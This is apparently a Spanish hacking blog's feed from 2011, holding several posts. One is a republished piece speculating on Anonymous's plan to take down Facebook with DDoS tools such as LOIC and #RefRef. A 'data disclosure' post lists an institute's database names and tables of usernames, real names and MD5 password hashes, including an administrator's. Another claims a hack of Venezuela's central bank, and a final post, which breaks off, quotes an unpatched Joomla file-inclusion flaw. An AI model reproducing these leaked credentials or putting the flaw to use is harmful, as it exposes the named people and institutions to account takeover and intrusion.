scheme="http://www.blogger.com/atom/ns#" term="Anonymous" /><title>#OPFACEBOOK ANONYMOUS CONTRA FACEBOOK ¿QUIÉN GANARÁ?</title><content type="html">&lt;div style="float: left; padding: 0px 20px 0px 0px; width: auto;"&gt;&lt;img src="http://3.bp.blogspot.com/-NuwRaMbS6UA/TkGbl-y2m8I/AAAAAAAAAko/d1RFHrrpGyw/s1600/opfacebook.gif" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;¿Qué pasa cuándo el &lt;a href="https://secure.wikimedia.org/wikipedia/es/wiki/Shiry%C5%AB_de_Drag%C3%B3n"&gt;puño más duro del mundo se enfrenta al escudo más resistente&lt;/a&gt; del mundo? A aquellos que veíais &lt;a href="https://secure.wikimedia.org/wikipedia/es/wiki/Saint_Seiya"&gt;Los Caballeros del Zodiaco&lt;/a&gt; siendo niños &lt;i&gt;(y no tan niños)&lt;/i&gt;, se os habrá dibujado una sonrisa en la cara.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Pues parece ser que en Otoño, vamos a poder ser testigos de una demostración práctica del misterio del puño y el escudo del Dragón.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Facebook, la red social en la que todo el Mundo tiene una cuenta, tiene las horas contadas.&lt;/b&gt; Así es, el día&lt;a href="http://www.youtube.com/watch?v=SWQTS8zqYXU"&gt; 5 de Noviembre es el elegido para destruir &lt;b&gt;Facebook&lt;/b&gt;&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Y es que la red social, capaz de permitirnos estar en contacto con amigos de todas las etapas de nuestra vida, así como de consumir gran parte de nuestro valioso tiempo, e incluso generar montones de nuevos casos de addición diariamente, le ha tocado las… le ha entrado por el ojo incorrecto al colectivo &lt;a href="https://secure.wikimedia.org/wikipedia/es/wiki/Anonymous"&gt;Anonymous&lt;/a&gt;.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El detonante que ha hecho encender la mecha de la ira de Anonymous ha sido que &lt;b&gt;Facebook ha comenzado a cerrar perfiles y cuentas de grupo de éstos&lt;/b&gt;. Asimismo, las "políticas de privacidad de datos" de Facebook &lt;i&gt;(ah, ¿pero Facebook respeta la privacidad de los datos?)&lt;/i&gt;, así como la supuesta &lt;b&gt;cesión o venta de datos privados por parte de Facebook a entidades gubernamentales&lt;/b&gt;, ha contribuido a convocar un hito histórico: Destruir Facebook.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ya sé que suena a película, de hecho, hasta la fecha elegida para el acto, lo es!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En la película "&lt;a href="https://secure.wikimedia.org/wikipedia/es/wiki/V_de_Vendetta"&gt;V de Vendetta&lt;/a&gt;", se podía ver a un revolucionario en un supuesto Reino Unido controlado que pretendía atentar en el Parlamento Británico mediante un tren cargado de explosivos. En dicha película, el individuo protegía su anonimato con la popular máscara de &lt;a href="https://secure.wikimedia.org/wikipedia/es/wiki/Guy_Fawkes"&gt;Guy Fawkes&lt;/a&gt;, rememorando que éste útimo también atentó contra el Parlamento Británico en 1605. En ambos casos, la fecha elegida para el complot de la pólvora era el 5 de Noviembre.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ahora la pregunta del millón: &lt;b&gt;¿Cómo piensa Anonymous cepillarse Facebook? ¿Se trata de generar un DDoS una vez más?&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La herramienta utilizada para estos fines era LOIC. Actualmente &lt;a href="http://www.blogger.com/goog_2133762917"&gt;Anonymous cuenta una nueva herramienta, llamada &lt;/a&gt;&lt;b&gt;&lt;a href="http://www.thetechherald.com/article.php/201130/7445/Anonymous-testing-LOIC-replacements-new-tool-uses-server-exploits"&gt;#RefRef&lt;/a&gt;, que utilizando Javascript y SQL&lt;/b&gt;, es capaz de dejar sin servicio algunos sitios web en pocos segundos. Evidentemente, para que esta herramienta sea efectiva, los sitios web objetivos deben tener cierta vulnerabilidad explotable. De hecho, &lt;a href="http://twitter.com/#%21/pastebin/status/96881812567101441"&gt;el sitio Pastebin, ya quedó fuera de combate&lt;/a&gt; después de ejecutarse la nueva herramienta durante 17 segundos. Los detalles del funcionamiento de dicha herramienta, deben tener que ver, además de efectuar una gran cantidad de peticiones lícitas por segundo, con alguna vulnerabilidad SQL que permite consultas excesivamente pesadas, y que de forma recurrente y concurrente, desborde la capacidad de los servidores de bases de datos de backend y por tanto, derive en una denegación de servicio.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Ya hemos comentado varias veces que &lt;a href="http://www.securitybydefault.com/2010/10/como-mitigar-ataques-de-denegacion-de.html"&gt;generar un DDoS a según qué infraestructuras&lt;/a&gt; no es algo trivial. Incluso a Anonymous &lt;i&gt;(y a no tan anonymous)&lt;/i&gt; les resultó imposible "tumbar" la web del PSOE, mediante LOIC, en una de las votaciones para aprobar la ley Sinde, gracias a estar cacheada por Akamai&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;El &lt;b&gt;tráfico manejado por Facebook diariamente&lt;/b&gt;, que sin saber las cifras reales, supongo que &lt;b&gt;debe ser suficiente como para provocar un DDoS a prácticamente cualquier organización&lt;/b&gt;, permite adivinar que la infraestructura necesaria para un correcto funcionamiento debe ser el sueño o la pesadilla de un administrador de redes. Así pues, la pregunta de qué cantidad de ancho de banda y/o número de peticiones es necesario para mellar el rendimiento de Facebook, lo sabremos, a modo Record Guiness a partir del 6 de Noviembre.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sin embargo, el mensaje publicado por Anonymous es que van a "destruir Facebook". Tumbarlo por unas horas, aparte de aumentar la productividad de ciertos trabajadores &lt;i&gt;(¿verdad Susana?)&lt;/i&gt;, que no les quedaría otra cosa mejor que hacer que serían más productivos, generaría un gran impacto mediático y quedaría en una curiosa historia, pero nada más. Lo preocupante es realmente que Anonymous lo planea DESTRUIR. "&lt;b&gt;Los datos de sus usuarios serán borrados, aunque Facebook los recuperará después&lt;/b&gt;". Esto, parece ser que no se trata de un DDoS ya sea con LOIC o #Refref, sino de algo más gordo. &lt;b&gt;¿Habrán encontrado una vulnerabilidad lo suficientemente crítica que les permita borrar los Petabytes y petabytes que conforman Facebook? ¿Cuánto se tarda en hacer ese gran "rm -rf" o será un "Delete from users"? ¿Se tratará de algún fallo que permita generar bajas de todos los usuarios en cascada?&lt;/b&gt; Tendría sentido en ese caso el decir que tirando de backup, Facebook repondrá la información: Recordad que Facebook y su "des-política de des-privacidad" impide que cuando te das de baja se borren tus datos, sino que los guarda por si vuelves.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En cualquier caso, aventurarse a predecir el fin del Mundo &lt;i&gt;(al menos del Mundo Facebook)&lt;/i&gt; y ponerle una fecha determinada, basándose en una vulnerabilidad encontrada en Agosto, para ser explotada el día 5 de Noviembre, faltando aún unos 4 meses, también me parecería cuanto menos aventurado, máxime teniendo en cuenta que Facebook es de las empresas que mantiene un programa de gratificaciones para aquellos que encuentren y reporten vulnerabilidades. Si yo fuera Facebook, empezaría pidiéndoles los logs del servidor web a los administradores de PasteBin para decidir si hacer o no el testamento.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por si acaso el día 4 de Noviembre, me despediré de todos mis contactos Facebook, y si finalmente eso pasa, tendré la excusa para aceptar la invitación a Google+ que aún está en mi lista de To Do. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Si al final, esta campaña se trata de un deseo, una realidad, un órdago, o una estrategia de márketing de Google, como decía un tío mío, "El tiempo lo dirá".&lt;/div&gt;&lt;br /&gt;
&lt;b&gt;Fuente: &lt;a href="http://www.securitybydefault.com/2011/08/opfacebook-anonymous-contra-facebook.html"&gt;securitybydefault.com&lt;/a&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-3246806155106607896?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4Sqlw0X7yxRF-4WMAfRcNv1SOYE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Sqlw0X7yxRF-4WMAfRcNv1SOYE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/4Sqlw0X7yxRF-4WMAfRcNv1SOYE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4Sqlw0X7yxRF-4WMAfRcNv1SOYE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/etgIXMj_iZA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/3246806155106607896/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/08/opfacebook-anonymous-contra-facebook.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3246806155106607896?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/3246806155106607896?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/etgIXMj_iZA/opfacebook-anonymous-contra-facebook.html" title="#OPFACEBOOK ANONYMOUS CONTRA FACEBOOK ¿QUIÉN GANARÁ?" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-NuwRaMbS6UA/TkGbl-y2m8I/AAAAAAAAAko/d1RFHrrpGyw/s72-c/opfacebook.gif" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/08/opfacebook-anonymous-contra-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQESXw8fSp7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-5824919945656903851</id><published>2011-07-26T23:43:00.000-07:00</published><updated>2011-12-08T20:51:48.275-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:51:48.275-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Disclosure" /><title>INSTITUTO DE EDUCACIÓN TÉCNICA PROFESIONAL [DATA DISCLOSURE]</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.intep.edu.co/Es/images/Header.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="65" src="http://www.intep.edu.co/Es/images/Header.gif" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;BASES DE DATOS:&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush: php"&gt;Current DB: bd_web
[+] information_schema
[+] SAVE
[+] WarGame
[+] bd874b
[+] bd_admin
[+] bd_adminweb
[+] bd_agenda
[+] bd_bienes
[+] bd_chat
[+] bd_comunic
[+] bd_contratos
[+] bd_egresados
[+] bd_fenosa
[+] bd_flisol
[+] bd_geografia
[+] bd_inscr
[+] bd_planeacion
[+] bd_presupuesto
[+] bd_publicacion
[+] bd_publicaciones
[+] bd_quejas
[+] bd_sgc
[+] bd_wargame
[+] bd_web
[+] bd_web_en
[+] ceinfo2
[+] correspondencia
[+] db_kata
[+] eniac
[+] fedeintep
[+] foros
[+] gegar1_intep
[+] intep3d
[+] lpa
[+] moodle
[+] mysql
[+] performance_schema
[+] sistemascsc
[+] test
[+] ventanilla
[+] wargusr
[+] weblogs&lt;/pre&gt;&lt;br /&gt;
&lt;b&gt;INFORMACIÓN DE USUARIOS: &lt;/b&gt;WarGame&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse;"&gt;&lt;tbody&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFFFCE" nowrap="nowrap"&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;num_resp&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap="nowrap"&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;password&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap="nowrap"&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;usuario&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap="nowrap"&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;Id_usuario&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;      &lt;td bgcolor="#FFFFCE" nowrap="nowrap"&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;grupo_usuario&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;f8f41b06b55d33fbf975bc36bdf9e6d4&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;chilito&lt;/td&gt;      &lt;td bgcolor="#FFF7F2"&gt;1&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;Chilito&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFFFFF"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;6f5fcdd919fb0a919e6a3752f37cd6e5&lt;/td&gt;      &lt;td bgcolor="#FFFFFF"&gt;sistemas_3&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;2&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;Sitemas III&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;6&lt;/td&gt;      &lt;td bgcolor="#FFF7F2"&gt;9f63b1509a6bae0742e3278022fd167d&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;game_killers&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;3&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;Game Killers&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;      &lt;td bgcolor="#FFFFFF"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;a2db7088322569de502d0930d62a3365&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;pkers&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;4&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;Pkers&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;20f0b16463f1c64340264fb9a02a51fd&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;ceres_dovio&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;5&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;Ceres El Dovio&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFFFFF"&gt;4&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;d83cae1554ce8ed562f6e698f4b2a1ef&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;sistemas_v&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;6&lt;/td&gt;      &lt;td bgcolor="#FFFFFF"&gt;Sistemas V&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;d6f682aa58de0aef6ca159c924617e46&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;experto&lt;/td&gt;      &lt;td bgcolor="#FFF7F2"&gt;7&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;Menos Experto&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFFFFF"&gt;6&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;7ca5f4549b531686d1040999fafd4453&lt;/td&gt;      &lt;td bgcolor="#FFFFFF"&gt;x1nux&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;8&lt;/td&gt;     &lt;td bgcolor="#FFFFFF"&gt;Elkin Morales&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;6&lt;/td&gt;      &lt;td bgcolor="#FFF7F2"&gt;b20f9bdd006b91244f4640b619bc0da1&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;nonone&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;9&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;nonone&lt;/td&gt;    &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse;"&gt;&lt;tbody&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFFFCE" nowrap=""&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;pass_admin&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap=""&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;user_admin&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap=""&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;nombers_admin&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;     &lt;td bgcolor="#FFFFCE" nowrap=""&gt;&lt;b&gt;&lt;span style="color: #dc883d;"&gt;id_admin&lt;/span&gt;&lt;/b&gt;&lt;/td&gt;    &lt;/tr&gt;
&lt;tr&gt;     &lt;td bgcolor="#FFF7F2"&gt;b8923b3cd9109972b56dddebc329650b&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;webmaster@intep&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;Juan Manuel Franco&lt;/td&gt;     &lt;td bgcolor="#FFF7F2"&gt;1&lt;/td&gt;    &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-5824919945656903851?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GGqHqXlzZ_A_ssni8-dqyZ-N5do/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GGqHqXlzZ_A_ssni8-dqyZ-N5do/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GGqHqXlzZ_A_ssni8-dqyZ-N5do/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GGqHqXlzZ_A_ssni8-dqyZ-N5do/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/dLYdBQGSgjU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/5824919945656903851/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/instituto-de-educacion-tecnica.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5824919945656903851?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/5824919945656903851?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/dLYdBQGSgjU/instituto-de-educacion-tecnica.html" title="INSTITUTO DE EDUCACIÓN TÉCNICA PROFESIONAL [DATA DISCLOSURE]" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/instituto-de-educacion-tecnica.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQGSXc7fip7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-1123672032886618969</id><published>2011-07-19T11:35:00.000-07:00</published><updated>2011-12-08T20:52:08.906-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:52:08.906-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacked" /><category scheme="http://www.blogger.com/atom/ns#" term="Diclosure" /><title>[DISCLOSURE] BANCO CENTRAL DE VENEZUELA - HACKED!</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://venciclopedia.com/images/thumb/6/66/Banco_Central_de_Venezuela_logo_2.jpg/205px-Banco_Central_de_Venezuela_logo_2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://venciclopedia.com/images/thumb/6/66/Banco_Central_de_Venezuela_logo_2.jpg/205px-Banco_Central_de_Venezuela_logo_2.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;b&gt;&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZYmQ4Mjc1OGMtMWM3OS00MDMyLWIwMmMtNzBlNGM0MzMyZDlm&amp;amp;hl=es"&gt;BANCO CENTRAR DE LA REPÚBLICA - BALANCE GENERAL&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZZThlYTBjMTctYzcyMy00MDYxLWFiYTgtNGY1YmVmODI2NzRl&amp;amp;hl=es"&gt;RESERVAS INTERNACIONALES Y TIPOS DE CAMBIO DE REFERENCIA&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZNjhhNDhkMDktMTNiYS00NjczLTliNTAtNDc3ZjNkMGM5ZTJl&amp;amp;hl=es"&gt;TASAS DE INTERÉS ANUALES NOMINALES PROMEDIO PONDERADAS&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZYjQ1YjBhOTctNTNhYy00ZDA3LWJjOWYtNDk4Y2U3NmU3ZDRk&amp;amp;hl=es"&gt;TIPOS DE CAMBIO DE REFERENCIA&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZMmMzYjFhM2UtMjgxZS00NTNlLWIxOGMtNDAzNDMxNjJlOGEw&amp;amp;hl=es"&gt;TASA DE INTERÉS APLICABLE AL CÁLCULO DE LOS INTERESES SOBRE PRESTACIONES SOCIALES&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B7FJ_rxyScaZNWU2ZjlkM2MtMWUwZi00ZGEyLWJjODgtOWY5NzE3Y2RjM2Zh&amp;amp;hl=es"&gt;INDICE NACIONAL DE PRECIOS AL CONSUMIDOR&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-1123672032886618969?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/uXYTgqBdwLCbxogYhSJcc7G35ic/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uXYTgqBdwLCbxogYhSJcc7G35ic/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/uXYTgqBdwLCbxogYhSJcc7G35ic/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/uXYTgqBdwLCbxogYhSJcc7G35ic/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/hYoQAjItmmo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/1123672032886618969/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/07/disclosure-banco-centrar-de-venezuela.html#comment-form" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1123672032886618969?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/1123672032886618969?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/hYoQAjItmmo/disclosure-banco-centrar-de-venezuela.html" title="[DISCLOSURE] BANCO CENTRAL DE VENEZUELA - HACKED!" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>2</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/07/disclosure-banco-centrar-de-venezuela.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQHRHo-eip7ImA9WhRQFE0.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-5899572612010029537</id><published>2011-07-15T14:16:00.000-07:00</published><updated>2011-12-08T20:52:15.452-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-08T20:52:15.452-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="LFI" /><category scheme="http://www.blogger.com/atom/ns#" term="Joomla" /><category scheme="http://www.blogger.com/atom/ns#" term="0day" /><title>SIMPLE PAGE OPTION LFI MODULE JOOMLA</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://rainchyld.net/wp-content/uploads/2009/04/etcpasswd.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://rainchyld.net/wp-content/uploads/2009/04/etcpasswd.gif" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;b&gt;CÓDIGO VULNERABLE:&lt;/b&gt;&lt;br /&gt;
&lt;pre class="brush: php"&gt;$s_lang =&amp;amp; JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
&lt;/pre&gt;&lt;br /&gt;
Hace include de lo que llames con ciertos parámetros... La ultima version que es la &lt;b&gt;1.5.16&lt;/b&gt; y todas las &lt;b&gt;1.5.x&lt;/b&gt; tambien lo son. Se puede resolver facilmente agregandole un &lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;str_replace&lt;/span&gt; o con permisos de lectura desde el htaccess &lt;i&gt;(este lo recomiendo)&lt;span class="Apple-style-span" style="font-family: inherit;"&gt;.&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
